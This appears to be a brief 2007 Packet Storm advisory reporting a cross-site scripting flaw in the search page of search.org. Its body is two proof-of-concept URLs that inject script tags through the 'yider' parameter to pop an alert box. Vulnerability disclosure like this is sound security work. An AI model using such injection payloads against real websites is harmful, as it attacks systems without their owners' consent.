search-xss.txt

2007-08-24T00:00:00
ID PACKETSTORM:58800
Type packetstorm
Reporter rootkit
Modified 2007-08-24T00:00:00

Description

                                        
                                            `SEARCH, The National Consortium for Justice Information and Statistics Search suffers from a cross site scripting vulnerability  
  
http://www.search.org/search/default.asp?yider=%3CIMG%20%22%22%22%3E%3CSCRIPT%3Ealert(%22prueba%22)%3C/SCRIPT%3E%22%3E  
http://www.search.org/search/default.asp?yider=%3CSCRIPT%3Ealert('Prueba')%3C/SCRIPT%3E`